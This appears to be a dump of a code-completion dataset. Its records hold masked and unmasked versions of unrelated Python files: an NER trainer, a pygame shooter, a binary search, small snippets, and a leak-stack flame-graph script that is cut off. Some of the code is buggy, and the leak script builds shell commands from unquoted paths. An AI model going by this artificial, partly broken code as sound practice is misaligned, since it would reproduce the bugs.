return [iter_seq(x) for x in args]
def generate_char_seq(batch):
'''
传进来是50一个块 总共有多少块
然后将每块的单词转为字符序列
:param batch:
:return:
'''
x = [[len(idx2word[i]) for i in k] for k in batch] # 得出每个单词的长度
maxlen = max([j for i in x for j in i]) # 最大长度
temp = np.zeros((batch.shape[0], batch.shape[1], maxlen), dtype=np.int32)
for i in range(batch.shape[0]):
for k in range(batch.shape[1]):
for no, c in enumerate(idx2word[batch[i, k]]):
temp[i, k, -1-no] = char2idx[c]
return temp # [文章数, 单词个数, maxlen(每个单词按字符转的id)]
def pred2label(pred):
# 将预测结果转为标签
out = []
for pred_i in pred:
out_i = []
for p in pred_i:
out_i.append(idx2tag[p])
out.append(out_i)
return out
if __name__ == '__main__':
left_train, right_train = parse('./data/eng.train')
left_test, right_test = parse('./data/eng.testa')
# print(left_train[:10])
# print(right_train[:10])
word2idx = {'PAD': 0, 'NUM': 1, 'UNK': 2} # 词表
tag2idx = {'PAD': 0} # 词性表
char2idx = {'PAD': 0}
word_idx = 3
tag_idx = 1
char_idx = 1
train_X, train_Y = parse_XY(left_train, right_train)
test_X, test_Y = parse_XY(left_test, right_test)
# print(train_X[:20])
# print(train_Y[:20])
idx2word = {idx: tag for tag, idx in word2idx.items()}
idx2tag = {i: w for w, i in tag2idx.items()}
seq_len = 50
X_seq, Y_seq = to_train_seq(train_X, train_Y) # 长度为50为一个段落
X_char_seq = generate_char_seq(X_seq)
print(X_seq.shape) # (203571, 50)
print(X_char_seq.shape) # (203571, 50, 61)
X_seq_test, Y_seq_test = to_train_seq(test_X, test_Y)
X_char_seq_test = generate_char_seq(X_seq_test)
print(X_seq_test.shape) # (51312, 50)
print(X_char_seq_test.shape) # (51312, 50, 27)
train_X, train_Y, train_char = X_seq, Y_seq, X_char_seq
test_X, test_Y, test_char = X_seq_test, Y_seq_test, X_char_seq_test
tf.reset_default_graph()
sess = tf.Session()
dim_word = 64
dim_char = 128
dropout = 0.8
learning_rate = 1e-3
hidden_size_char = 128
hidden_size_word = 128
num_layers = 2
batch_size = 32
model = Model(dim_word, dim_char, dropout, learning_rate,
hidden_size_char, hidden_size_word, num_layers)
sess.run(tf.global_variables_initializer())
for e in range(3):
train_acc, train_loss, test_acc, test_loss = 0, 0, 0, 0
for i in range(0, len(train_X), batch_size):
batch_x = train_X[i: min(i + batch_size, train_X.shape[0])]
batch_char = train_char[i: min(i + batch_size, train_X.shape[0])]
batch_y = train_Y[i: min(i + batch_size, train_X.shape[0])]
acc, cost, _ = sess.run(
[model.accuracy, model.cost, model.optimizer],
feed_dict={
model.word_ids: batch_x,
model.char_ids: batch_char,
model.labels: batch_y
},
)
train_loss += cost
train_acc += acc
print('train_data: epoch:{}, step:{}, loss:{}, accuracy:{}'.format(e, i//batch_size+1, cost, acc))
for i in range(0, len(test_X), batch_size):
batch_x = test_X[i: min(i + batch_size, test_X.shape[0])]
batch_char = test_char[i: min(i + batch_size, test_X.shape[0])]
batch_y = test_Y[i: min(i + batch_size, test_X.shape[0])]
acc, cost = sess.run(
[model.accuracy, model.cost],
feed_dict={
model.word_ids: batch_x,
model.char_ids: batch_char,
model.labels: batch_y
},
)
test_loss += cost
test_acc += acc
print('test_data: epoch:{}, step:{}, loss:{}, accuracy:{}'.format(e, i//batch_size+1, cost, acc))
train_loss /= len(train_X) / batch_size
train_acc /= len(train_X) / batch_size
test_loss /= len(test_X) / batch_size
test_acc /= len(test_X) / batch_size
print('epoch: %d, training loss: %f, training acc: %f, valid loss: %f, valid acc: %f\n'
% (e, train_loss, train_acc, test_loss, test_acc))
real_Y, predict_Y = [], []
for i in range(0, len(test_X), batch_size):
batch_x = test_X[i: min(i + batch_size, test_X.shape[0])]
batch_char = test_char[i: min(i + batch_size, test_X.shape[0])]
batch_y = test_Y[i: min(i + batch_size, test_X.shape[0])]
predicted = pred2label(
sess.run(model.tags_seq,
feed_dict={
model.word_ids: batch_x,
model.char_ids: batch_char,
},
)
)
real = pred2label(batch_y)
predict_Y.extend(predicted)
real_Y.extend(real)
print(classification_report(np.array(real_Y).ravel(), np.array(predict_Y).ravel())) | [
7,
8,
10,
12,
13
] |
11 | 54e04d740ef46fca04cf4169d2e7c05083414bd8 | <mask token>
class Player:
<mask token>
<mask token>
<mask token>
class Bullet:
def __init__(self, color):
self.x = 0
self.y = 0
self.angle = 0
self.color = color
def draw(self):
pygame.draw.rect(scr, self.color, pygame.Rect(self.x, self.y, 5, 5))
class Gun:
def __init__(self):
self.x = 0
self.y = 0
self.bullets = []
self.bullets2 = []
def shoot1(self, x, y, angle):
self.bullets.append(Bullet((0, 255, 255)))
self.bullets[-1].x = x
self.bullets[-1].y = y
self.bullets[-1].angle = angle
def shoot2(self, x, y, angle):
self.bullets2.append(Bullet((255, 255, 0)))
self.bullets2[-1].x = x
self.bullets2[-1].y = y
self.bullets2[-1].angle = angle
class Enemy:
def __init__(self):
self.x = 100
self.y = 100
self.speed = 2
self.hearts = 3
self.image = pygame.image.load('enemy.png')
def draw(self):
scr.blit(self.image, (self.x, self.y))
def rotate(self, x, y):
oppos = math.fabs(y - self.y)
adjac = math.fabs(x - self.x)
hypot = math.hypot(oppos, adjac)
sin = oppos / hypot
radians = math.asin(sin)
angle = radians * (180 / 3.14)
if x > self.x:
if y > self.y:
angle -= angle + angle
if x < self.x:
angle = 180 + (angle - (angle + angle))
if y > self.y:
angle -= angle + angle
return angle - 90
def distance(self, x, y):
oppos = math.fabs(y - self.y)
adjac = math.fabs(x - self.x)
hypot = math.hypot(oppos, adjac)
return hypot
def spawn(self):
enemies.append(Enemy())
enemies[-1].x = random.randint(0, 600)
enemies[-1].y = random.randint(0, 600)
<mask token>
| <mask token>
class Player:
<mask token>
def draw(self):
scr.blit(self.image, (self.x, self.y))
<mask token>
class Bullet:
def __init__(self, color):
self.x = 0
self.y = 0
self.angle = 0
self.color = color
def draw(self):
pygame.draw.rect(scr, self.color, pygame.Rect(self.x, self.y, 5, 5))
class Gun:
def __init__(self):
self.x = 0
self.y = 0
self.bullets = []
self.bullets2 = []
def shoot1(self, x, y, angle):
self.bullets.append(Bullet((0, 255, 255)))
self.bullets[-1].x = x
self.bullets[-1].y = y
self.bullets[-1].angle = angle
def shoot2(self, x, y, angle):
self.bullets2.append(Bullet((255, 255, 0)))
self.bullets2[-1].x = x
self.bullets2[-1].y = y
self.bullets2[-1].angle = angle
class Enemy:
def __init__(self):
self.x = 100
self.y = 100
self.speed = 2
self.hearts = 3
self.image = pygame.image.load('enemy.png')
def draw(self):
scr.blit(self.image, (self.x, self.y))
def rotate(self, x, y):
oppos = math.fabs(y - self.y)
adjac = math.fabs(x - self.x)
hypot = math.hypot(oppos, adjac)
sin = oppos / hypot
radians = math.asin(sin)
angle = radians * (180 / 3.14)
if x > self.x:
if y > self.y:
angle -= angle + angle
if x < self.x:
angle = 180 + (angle - (angle + angle))
if y > self.y:
angle -= angle + angle
return angle - 90
def distance(self, x, y):
oppos = math.fabs(y - self.y)
adjac = math.fabs(x - self.x)
hypot = math.hypot(oppos, adjac)
return hypot
def spawn(self):
enemies.append(Enemy())
enemies[-1].x = random.randint(0, 600)
enemies[-1].y = random.randint(0, 600)
<mask token>
| <mask token>
pygame.init()
<mask token>
class Player:
def __init__(self):
self.x = 275
self.y = 275
self.image = pygame.image.load('player.jpg')
self.image1 = pygame.image.load('hearts.png')
self.lives = 5
def draw(self):
scr.blit(self.image, (self.x, self.y))
def rotate(self, x, y):
oppos = math.fabs(y - self.y)
adjac = math.fabs(x - self.x)
hypot = math.hypot(oppos, adjac)
sin = oppos / hypot
radians = math.asin(sin)
angle = radians * (180 / 3.14)
if x > self.x:
if y > self.y:
angle -= angle + angle
if x < self.x:
angle = 180 + (angle - (angle + angle))
if y > self.y:
angle -= angle + angle
return angle - 90
class Bullet:
def __init__(self, color):
self.x = 0
self.y = 0
self.angle = 0
self.color = color
def draw(self):
pygame.draw.rect(scr, self.color, pygame.Rect(self.x, self.y, 5, 5))
class Gun:
def __init__(self):
self.x = 0
self.y = 0
self.bullets = []
self.bullets2 = []
def shoot1(self, x, y, angle):
self.bullets.append(Bullet((0, 255, 255)))
self.bullets[-1].x = x
self.bullets[-1].y = y
self.bullets[-1].angle = angle
def shoot2(self, x, y, angle):
self.bullets2.append(Bullet((255, 255, 0)))
self.bullets2[-1].x = x
self.bullets2[-1].y = y
self.bullets2[-1].angle = angle
class Enemy:
def __init__(self):
self.x = 100
self.y = 100
self.speed = 2
self.hearts = 3
self.image = pygame.image.load('enemy.png')
def draw(self):
scr.blit(self.image, (self.x, self.y))
def rotate(self, x, y):
oppos = math.fabs(y - self.y)
adjac = math.fabs(x - self.x)
hypot = math.hypot(oppos, adjac)
sin = oppos / hypot
radians = math.asin(sin)
angle = radians * (180 / 3.14)
if x > self.x:
if y > self.y:
angle -= angle + angle
if x < self.x:
angle = 180 + (angle - (angle + angle))
if y > self.y:
angle -= angle + angle
return angle - 90
def distance(self, x, y):
oppos = math.fabs(y - self.y)
adjac = math.fabs(x - self.x)
hypot = math.hypot(oppos, adjac)
return hypot
def spawn(self):
enemies.append(Enemy())
enemies[-1].x = random.randint(0, 600)
enemies[-1].y = random.randint(0, 600)
<mask token>
cmd.spawn()
cmd.spawn()
<mask token>
while True:
frames += 1
scr.fill((0, 0, 0))
for event in pygame.event.get():
key = pygame.key.get_pressed()
Mpos = pygame.mouse.get_pos()
if event.type == 5:
gun.shoot1(player.x + 12.5, player.y + 12.5, angle)
for i in range(0, player.lives):
scr.blit(player.image1, (i * 35, 1))
for i in range(len(gun.bullets)):
try:
gun.bullets[i].x = gun.bullets[i].x + 4 * math.cos(math.radians
(gun.bullets[i].angle + 90))
gun.bullets[i].y = gun.bullets[i].y + 4 * math.sin(math.radians
(gun.bullets[i].angle - 90))
if gun.bullets[i].x > 600:
del gun.bullets[i]
if gun.bullets[i].x < 0:
del gun.bullets[i]
if gun.bullets[i].y > 600:
del gun.bullets[i]
if gun.bullets[i].y < 0:
del gun.bullets[i]
gun.bullets[i].draw()
except IndexError:
pass
for i in range(len(gun.bullets2)):
try:
gun.bullets2[i].x = gun.bullets2[i].x + 4 * math.cos(math.
radians(gun.bullets2[i].angle + 90))
gun.bullets2[i].y = gun.bullets2[i].y + 4 * math.sin(math.
radians(gun.bullets2[i].angle - 90))
if gun.bullets2[i].x > 600:
del gun.bullets2[i]
if gun.bullets2[i].x < 0:
del gun.bullets2[i]
if gun.bullets2[i].y > 600:
del gun.bullets2[i]
if gun.bullets2[i].y < 0:
del gun.bullets2[i]
gun.bullets2[i].draw()
except IndexError:
pass
for i in range(len(enemies)):
if enemies[i].distance(player.x, player.y) > 100:
enemies[i].x = enemies[i].x + enemies[i].speed * math.cos(math.
radians(enemies[i].rotate(player.x, player.y) + 90))
enemies[i].y = enemies[i].y + enemies[i].speed * math.sin(math.
radians(enemies[i].rotate(player.x, player.y) - 90))
enemies[i].image = pygame.image.load('enemy.png').convert()
enemies[i].image = enemies[i].image.copy()
enemies[i].image = pygame.transform.rotate(enemies[i].image,
enemies[i].rotate(player.x, player.y))
angle2 = enemies[i].rotate(player.x, player.y)
if frames % 100 == 0:
gun.shoot2(enemies[i].x + 12.5, enemies[i].y + 12.5, angle2)
enemies[i].draw()
for j in range(len(gun.bullets)):
for i in range(len(gun.bullets)):
try:
if gun.bullets[j].x > enemies[i].x and gun.bullets[j
].x < enemies[i].x + 25 and gun.bullets[j].y > enemies[i
].y and gun.bullets[j].y < enemies[i].y + 25:
del enemies[i]
except IndexError:
pass
for j in range(len(gun.bullets2)):
for i in range(len(gun.bullets2)):
try:
if gun.bullets2[j].x > player.x and gun.bullets2[j
].x < player.x + 25 and gun.bullets2[j
].y > player.y and gun.bullets2[j].y < player.y + 25:
for i in range(len(hit) - 1):
if not (hit[i].x > player.x or hit[i].x < player.x +
25 or hit[i].y > player.y or hit[i].y < player.y):
del hit[i]
if hit.count(gun.bullets2[j]) == 0:
hit.append(gun.bullets2[j])
player.lives = 5 - len(hit)
except IndexError:
pass
if key[pygame.K_a]:
player.x -= 3
if key[pygame.K_d]:
player.x += 3
if key[pygame.K_w]:
player.y -= 3
if key[pygame.K_s]:
player.y += 3
if frames % 150 == 0:
cmd.spawn()
if player.lives < 1:
pygame.quit()
break
player.image = pygame.image.load('player.jpg').convert()
player.image = player.image.copy()
player.image = pygame.transform.rotate(player.image, player.rotate(Mpos
[0], Mpos[1]))
angle = player.rotate(Mpos[0], Mpos[1])
player.draw()
pygame.display.update()
time.sleep(0.005)
quit()
| <mask token>
pygame.init()
scr = pygame.display.set_mode((700, 700))
enemies = []
hit = []
class Player:
def __init__(self):
self.x = 275
self.y = 275
self.image = pygame.image.load('player.jpg')
self.image1 = pygame.image.load('hearts.png')
self.lives = 5
def draw(self):
scr.blit(self.image, (self.x, self.y))
def rotate(self, x, y):
oppos = math.fabs(y - self.y)
adjac = math.fabs(x - self.x)
hypot = math.hypot(oppos, adjac)
sin = oppos / hypot
radians = math.asin(sin)
angle = radians * (180 / 3.14)
if x > self.x:
if y > self.y:
angle -= angle + angle
if x < self.x:
angle = 180 + (angle - (angle + angle))
if y > self.y:
angle -= angle + angle
return angle - 90
class Bullet:
def __init__(self, color):
self.x = 0
self.y = 0
self.angle = 0
self.color = color
def draw(self):
pygame.draw.rect(scr, self.color, pygame.Rect(self.x, self.y, 5, 5))
class Gun:
def __init__(self):
self.x = 0
self.y = 0
self.bullets = []
self.bullets2 = []
def shoot1(self, x, y, angle):
self.bullets.append(Bullet((0, 255, 255)))
self.bullets[-1].x = x
self.bullets[-1].y = y
self.bullets[-1].angle = angle
def shoot2(self, x, y, angle):
self.bullets2.append(Bullet((255, 255, 0)))
self.bullets2[-1].x = x
self.bullets2[-1].y = y
self.bullets2[-1].angle = angle
class Enemy:
def __init__(self):
self.x = 100
self.y = 100
self.speed = 2
self.hearts = 3
self.image = pygame.image.load('enemy.png')
def draw(self):
scr.blit(self.image, (self.x, self.y))
def rotate(self, x, y):
oppos = math.fabs(y - self.y)
adjac = math.fabs(x - self.x)
hypot = math.hypot(oppos, adjac)
sin = oppos / hypot
radians = math.asin(sin)
angle = radians * (180 / 3.14)
if x > self.x:
if y > self.y:
angle -= angle + angle
if x < self.x:
angle = 180 + (angle - (angle + angle))
if y > self.y:
angle -= angle + angle
return angle - 90
def distance(self, x, y):
oppos = math.fabs(y - self.y)
adjac = math.fabs(x - self.x)
hypot = math.hypot(oppos, adjac)
return hypot
def spawn(self):
enemies.append(Enemy())
enemies[-1].x = random.randint(0, 600)
enemies[-1].y = random.randint(0, 600)
cmd = Enemy()
gun = Gun()
player = Player()
cmd.spawn()
cmd.spawn()
last = 0
frames = 0
fro = 1
while True:
frames += 1
scr.fill((0, 0, 0))
for event in pygame.event.get():
key = pygame.key.get_pressed()
Mpos = pygame.mouse.get_pos()
if event.type == 5:
gun.shoot1(player.x + 12.5, player.y + 12.5, angle)
for i in range(0, player.lives):
scr.blit(player.image1, (i * 35, 1))
for i in range(len(gun.bullets)):
try:
gun.bullets[i].x = gun.bullets[i].x + 4 * math.cos(math.radians
(gun.bullets[i].angle + 90))
gun.bullets[i].y = gun.bullets[i].y + 4 * math.sin(math.radians
(gun.bullets[i].angle - 90))
if gun.bullets[i].x > 600:
del gun.bullets[i]
if gun.bullets[i].x < 0:
del gun.bullets[i]
if gun.bullets[i].y > 600:
del gun.bullets[i]
if gun.bullets[i].y < 0:
del gun.bullets[i]
gun.bullets[i].draw()
except IndexError:
pass
for i in range(len(gun.bullets2)):
try:
gun.bullets2[i].x = gun.bullets2[i].x + 4 * math.cos(math.
radians(gun.bullets2[i].angle + 90))
gun.bullets2[i].y = gun.bullets2[i].y + 4 * math.sin(math.
radians(gun.bullets2[i].angle - 90))
if gun.bullets2[i].x > 600:
del gun.bullets2[i]
if gun.bullets2[i].x < 0:
del gun.bullets2[i]
if gun.bullets2[i].y > 600:
del gun.bullets2[i]
if gun.bullets2[i].y < 0:
del gun.bullets2[i]
gun.bullets2[i].draw()
except IndexError:
pass
for i in range(len(enemies)):
if enemies[i].distance(player.x, player.y) > 100:
enemies[i].x = enemies[i].x + enemies[i].speed * math.cos(math.
radians(enemies[i].rotate(player.x, player.y) + 90))
enemies[i].y = enemies[i].y + enemies[i].speed * math.sin(math.
radians(enemies[i].rotate(player.x, player.y) - 90))
enemies[i].image = pygame.image.load('enemy.png').convert()
enemies[i].image = enemies[i].image.copy()
enemies[i].image = pygame.transform.rotate(enemies[i].image,
enemies[i].rotate(player.x, player.y))
angle2 = enemies[i].rotate(player.x, player.y)
if frames % 100 == 0:
gun.shoot2(enemies[i].x + 12.5, enemies[i].y + 12.5, angle2)
enemies[i].draw()
for j in range(len(gun.bullets)):
for i in range(len(gun.bullets)):
try:
if gun.bullets[j].x > enemies[i].x and gun.bullets[j
].x < enemies[i].x + 25 and gun.bullets[j].y > enemies[i
].y and gun.bullets[j].y < enemies[i].y + 25:
del enemies[i]
except IndexError:
pass
for j in range(len(gun.bullets2)):
for i in range(len(gun.bullets2)):
try:
if gun.bullets2[j].x > player.x and gun.bullets2[j
].x < player.x + 25 and gun.bullets2[j
].y > player.y and gun.bullets2[j].y < player.y + 25:
for i in range(len(hit) - 1):
if not (hit[i].x > player.x or hit[i].x < player.x +
25 or hit[i].y > player.y or hit[i].y < player.y):
del hit[i]
if hit.count(gun.bullets2[j]) == 0:
hit.append(gun.bullets2[j])
player.lives = 5 - len(hit)
except IndexError:
pass
if key[pygame.K_a]:
player.x -= 3
if key[pygame.K_d]:
player.x += 3
if key[pygame.K_w]:
player.y -= 3
if key[pygame.K_s]:
player.y += 3
if frames % 150 == 0:
cmd.spawn()
if player.lives < 1:
pygame.quit()
break
player.image = pygame.image.load('player.jpg').convert()
player.image = player.image.copy()
player.image = pygame.transform.rotate(player.image, player.rotate(Mpos
[0], Mpos[1]))
angle = player.rotate(Mpos[0], Mpos[1])
player.draw()
pygame.display.update()
time.sleep(0.005)
quit()
| import random
import math
import time
import pygame
pygame.init()
scr = pygame.display.set_mode((700,700))
enemies = []
#music = pygame.mixer.music.load('ENERGETIC CHIPTUNE Thermal - Evan King.mp3')
#pygame.mixer.music.play(-1)
hit = []
class Player:
def __init__(self):
self.x = 275
self.y = 275
self.image = pygame.image.load('player.jpg')
self.image1 = pygame.image.load('hearts.png')
self.lives = 5
def draw(self):
scr.blit(self.image,(self.x,self.y))
def rotate(self, x, y):
oppos = math.fabs(y - self.y)
adjac = math.fabs(x - self.x)
hypot = math.hypot(oppos,adjac)
sin = oppos/hypot
radians = math.asin(sin)
angle = radians * (180/3.14)
if x > self.x:
if y > self.y:
angle -= angle + angle
if x < self.x:
angle = 180 + (angle - (angle + angle))
if y > self.y:
angle -= angle + angle
return angle - 90
class Bullet:
def __init__(self, color):
self.x = 0
self.y = 0
self.angle = 0
self.color = color
def draw(self):
pygame.draw.rect(scr,self.color,pygame.Rect(self.x,self.y,5,5))
class Gun:
def __init__(self):
self.x = 0
self.y = 0
self.bullets = []
self.bullets2 = []
def shoot1(self,x,y,angle):
self.bullets.append(Bullet((0,255,255)))
self.bullets[-1].x = x
self.bullets[-1].y = y
self.bullets[-1].angle = angle
def shoot2(self,x,y,angle):
self.bullets2.append(Bullet((255,255,0)))
self.bullets2[-1].x = x
self.bullets2[-1].y = y
self.bullets2[-1].angle = angle
class Enemy:
def __init__(self):
self.x = 100
self.y = 100
self.speed = 2
self.hearts = 3
self.image = pygame.image.load('enemy.png')
def draw(self):
scr.blit(self.image,(self.x,self.y))
def rotate(self, x, y):
oppos = math.fabs(y - self.y)
adjac = math.fabs(x - self.x)
hypot = math.hypot(oppos,adjac)
sin = oppos/hypot
radians = math.asin(sin)
angle = radians * (180/3.14)
if x > self.x:
if y > self.y:
angle -= angle + angle
if x < self.x:
angle = 180 + (angle - (angle + angle))
if y > self.y:
angle -= angle + angle
return angle - 90
def distance(self,x,y):
oppos = math.fabs(y - self.y)
adjac = math.fabs(x - self.x)
hypot = math.hypot(oppos,adjac)
return hypot
def spawn(self):
enemies.append(Enemy())
enemies[-1].x = random.randint(0,600)
enemies[-1].y = random.randint(0,600)
cmd = Enemy()
gun = Gun()
player = Player()
cmd.spawn()
cmd.spawn()
last = 0
frames = 0
fro = 1
while True:
frames += 1
scr.fill((0,0,0))
for event in pygame.event.get():
key = pygame.key.get_pressed()
Mpos = pygame.mouse.get_pos()
if event.type == 5:
gun.shoot1(player.x + 12.5,player.y + 12.5,angle)
for i in range(0,player.lives):
scr.blit(player.image1,(i*35,1))
for i in range(len(gun.bullets)):
try:
gun.bullets[i].x = gun.bullets[i].x + 4 * math.cos(math.radians(gun.bullets[i].angle + 90))
gun.bullets[i].y = gun.bullets[i].y + 4 * math.sin(math.radians(gun.bullets[i].angle - 90))
if gun.bullets[i].x > 600:
del gun.bullets[i]
if gun.bullets[i].x < 0:
del gun.bullets[i]
if gun.bullets[i].y > 600:
del gun.bullets[i]
if gun.bullets[i].y < 0:
del gun.bullets[i]
gun.bullets[i].draw()
except IndexError:
pass
for i in range(len(gun.bullets2)):
try:
gun.bullets2[i].x = gun.bullets2[i].x + 4 * math.cos(math.radians(gun.bullets2[i].angle + 90))
gun.bullets2[i].y = gun.bullets2[i].y + 4 * math.sin(math.radians(gun.bullets2[i].angle - 90))
if gun.bullets2[i].x > 600:
del gun.bullets2[i]
if gun.bullets2[i].x < 0:
del gun.bullets2[i]
if gun.bullets2[i].y > 600:
del gun.bullets2[i]
if gun.bullets2[i].y < 0:
del gun.bullets2[i]
gun.bullets2[i].draw()
except IndexError:
pass
for i in range(len(enemies)):
if enemies[i].distance(player.x,player.y) > 100:
enemies[i].x = enemies[i].x + enemies[i].speed * math.cos(math.radians(enemies[i].rotate(player.x,player.y) + 90))
enemies[i].y = enemies[i].y + enemies[i].speed * math.sin(math.radians(enemies[i].rotate(player.x,player.y) - 90))
enemies[i].image = pygame.image.load("enemy.png").convert()
enemies[i].image = enemies[i].image.copy()
enemies[i].image = pygame.transform.rotate(enemies[i].image,enemies[i].rotate(player.x,player.y))
angle2 = enemies[i].rotate(player.x,player.y)
if frames % 100 == 0:
gun.shoot2(enemies[i].x + 12.5,enemies[i].y + 12.5,angle2)
enemies[i].draw()
for j in range(len(gun.bullets)):
for i in range(len(gun.bullets)):
try:
if gun.bullets[j].x > enemies[i].x and gun.bullets[j].x < enemies[i].x+25 and gun.bullets[j].y > enemies[i].y and gun.bullets[j].y < enemies[i].y + 25:
del enemies[i]
except IndexError:
pass
for j in range(len(gun.bullets2)):
for i in range(len(gun.bullets2)):
try:
if gun.bullets2[j].x > player.x and gun.bullets2[j].x < player.x+25 and gun.bullets2[j].y > player.y and gun.bullets2[j].y < player.y + 25:
for i in range(len(hit)-1):
if not (hit[i].x > player.x or hit[i].x < player.x+25 or hit[i].y > player.y or hit[i].y < player.y):
del hit[i]
if hit.count(gun.bullets2[j]) == 0:
hit.append(gun.bullets2[j])
player.lives = 5 - len(hit)
except IndexError:
pass
if key[pygame.K_a]:
player.x -= 3
if key[pygame.K_d]:
player.x += 3
if key[pygame.K_w]:
player.y -= 3
if key[pygame.K_s]:
player.y += 3
if frames % 150 == 0:
cmd.spawn()
if player.lives < 1:
pygame.quit()
break
player.image = pygame.image.load("player.jpg").convert()
player.image = player.image.copy()
player.image = pygame.transform.rotate(player.image,player.rotate(Mpos[0],Mpos[1]))
angle = player.rotate(Mpos[0],Mpos[1])
player.draw()
pygame.display.update()
time.sleep(0.005)
quit()
| [
14,
15,
18,
19,
21
] |
12 | 0a7ffc027511d5fbec0076f6b25a6e3bc3dfdd9b | '''
Given a sorted array and a target value, return the index if the target is found.
If not, return the index where it would be if it were inserted in order.
You may assume no duplicates in the array.
Here are few examples.
[1,3,5,6], 5 -> 2
[1,3,5,6], 2 -> 1
[1,3,5,6], 7 -> 4
[1,3,5,6], 0 -> 0
'''
class Solution(object):
def searchInsert(self, nums, target):
if target < nums[0]:
return 0
if target > nums[-1]:
return len(nums)
l_idx, h_idx = 0, len(nums)-1
while True:
m_idx = int((l_idx+h_idx)/2)
if l_idx >= h_idx:
return l_idx
elif target > nums[m_idx]:
l_idx = m_idx + 1
else:
h_idx = m_idx
sol = Solution()
print sol.searchInsert([1,3,5,6], 5)
print sol.searchInsert([1,3,5,6], 2)
print sol.searchInsert([1,3,5,6], 4)
print sol.searchInsert([1,3,5,6], 0)
| null | null | null | null | [
0
] |
13 | 2cbce618d1ec617d1c7dc0e9792b6a49361ec5a4 | <mask token>
| def mais_populoso(dic):
p = 0
sp = 0
for t, i in dic.items():
for m in dic[t].values():
p += m
if p > sp:
sp = p
x = t
return x
| def mais_populoso(dic):
p=0
sp=0
for t,i in dic.items():
for m in dic[t].values():
p+=m
if p>sp:
sp=p
x=t
return x | null | null | [
0,
1,
2
] |
14 | 2092ead8b8f268a22711b8af8052241c1ac00c15 | <mask token>
| <mask token>
print('%d시간에 %d%s 벌었습니다.' % (1, wage * 1, '달러'))
print('%d시간에 %d%s 벌었습니다.' % (5, wage * 5, '달러'))
print('%d시간에 %.1f%s 벌었습니다' % (1, 5710.8, '원'))
print('%d시간에 %.1f%s 벌었습니다' % (5, 28554.0, '원'))
| wage = 5
print('%d시간에 %d%s 벌었습니다.' % (1, wage * 1, '달러'))
print('%d시간에 %d%s 벌었습니다.' % (5, wage * 5, '달러'))
print('%d시간에 %.1f%s 벌었습니다' % (1, 5710.8, '원'))
print('%d시간에 %.1f%s 벌었습니다' % (5, 28554.0, '원'))
|
wage=5
print("%d시간에 %d%s 벌었습니다." %(1, wage*1, "달러"))
print("%d시간에 %d%s 벌었습니다." %(5, wage*5, "달러"))
print("%d시간에 %.1f%s 벌었습니다" %(1,5710.8,"원"))
print("%d시간에 %.1f%s 벌었습니다" %(5, 28554.0, "원"))
| null | [
0,
1,
2,
3
] |
15 | b5cbb73c152dd60e9063d5a19f6182e2264fec6d | #!/usr/bin/python
# coding=UTF-8
import sys
import subprocess
import os
def printReportTail(reportHtmlFile):
reportHtmlFile.write("""
</body>
</html>
""")
def printReportHead(reportHtmlFile):
reportHtmlFile.write("""<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
</head>
<body>
""")
def printTitle(reportHtmlFile, title):
reportHtmlFile.write("<h2>" + title + "</h2>\n")
def printText(reportHtmlFile, text):
reportHtmlFile.write("<h4>" + text + "</h4>\n")
def printSVG(reportHtmlFile, svgPath):
reportHtmlFile.write('<embed src="')
reportHtmlFile.write(svgPath)
reportHtmlFile.write('" type="image/svg+xml" />')
def ParseStack(currentPath, ndkPath, stackFile, architecture, symbolsDir):
print "currentPath: " + currentPath
# 查找addr2line文件
print "architecture is " + architecture
if architecture == "arm64-v8a":
addr2line = ndkPath + "/toolchains/aarch64-linux-android-4.9/prebuilt/darwin-x86_64/bin/aarch64-linux-android-addr2line"
elif architecture == "armeabi" or architecture == "armeabi-v7a":
addr2line = ndkPath + "/toolchains/arm-linux-androideabi-4.9/prebuilt/darwin-x86_64/bin/arm-linux-androideabi-addr2line"
else:
print "do not support architecture type for " + architecture
print "only support armeabi/armeabi-v7a/arm64-v8a"
return
print "addr2line path: " + addr2line
if not os.path.exists(addr2line):
print "can not find " + architecture + " addr2line"
else:
print "find " + architecture + " addr2line"
reportHtmlPath = os.path.split(stackFile)[0] + "/leakReport.html"
if os.path.exists(reportHtmlPath):
os.unlink(reportHtmlPath)
reportHtmlFile = open(reportHtmlPath, "a")
printReportHead(reportHtmlFile)
# 处理stack文件
for line in open(stackFile):
if line.startswith("libName:"):
libName = line.replace("libName:", "").replace('\n', '').replace('\r', '')
printTitle(reportHtmlFile, libName)
libAbsolutePath = os.path.split(stackFile)[0] + "/" + libName
if not os.path.exists(libAbsolutePath):
os.makedirs(libAbsolutePath)
flStackFilePath = libAbsolutePath + "/fl_stack.txt"
flameGraphFile = open(flStackFilePath, "w")
print "find lib: " + libName
elif line.startswith("leakSize:"):
leakSize = line.replace("leakSize:", "").replace('\n', '').replace('\r', '')
leakMsg = "leak size: " + leakSize + "\n"
printText(reportHtmlFile, leakMsg)
print leakMsg
elif line.startswith("stack:"):
stack = line.replace("stack:", "").replace('\n', '').replace('\r', '')
# print "stack: "
for stackElement in stack.split("^"):
if stackElement == "":
continue
dlinfo = stackElement.split("|")
pc = dlinfo[0]
libPath = dlinfo[1]
symbol = dlinfo[2]
# print "pc " + pc + " " + libPath + " " + symbol
symbolFile = symbolsDir + "/" + os.path.split(libPath)[1]
if os.path.exists(symbolFile):
# print "---------"
parseCommend = addr2line + " -Ce " + symbolFile + " -f " + pc
# print parseCommend
# os.system(parseCommend)
result = os.popen(parseCommend)
res = result.read()
retraces = res.splitlines()
if len(retraces) != 2 or "?" in retraces[0] or "?" in retraces[1]:
if symbol != "":
method = symbol
codeLine = -1
else:
method = pc
codeLine = -1
else:
method = retraces[0]
codeLine = retraces[1]
# print method
# print codeLine
elif symbol != "":
method = symbol
codeLine = -1
else:
method = pc
codeLine = -1
flameGraphFile.write(method + ";")
flameGraphFile.write(" 1\n")
elif line.replace('\n', '').replace('\r', '') == "libSplit!!!":
# 结束了一个lib的输出
print "finish lib " + libName + " parse"
plExePath = os.path.split(currentPath)[0] + "/flamegraph.pl"
svgPath = libAbsolutePath + "/" + libName + ".svg"
commend = plExePath + " " + flStackFilePath + " > " + svgPath
os.system(commend)
printSVG(reportHtmlFile, svgPath.replace(os.path.split(libAbsolutePath)[0], "./"))
printReportTail(reportHtmlFile)
def main(args):
if 4 > len(args):
print("请输入\"android ndk路径\" \"stack文件路径\" \"arm架构(armeabi/armeabi-v7a/arm64-v8a)\" \"带符号表so所在目录\"")
return
ParseStack(args[0], args[1], args[2], args[3], args[4])
if __name__ == "__main__":
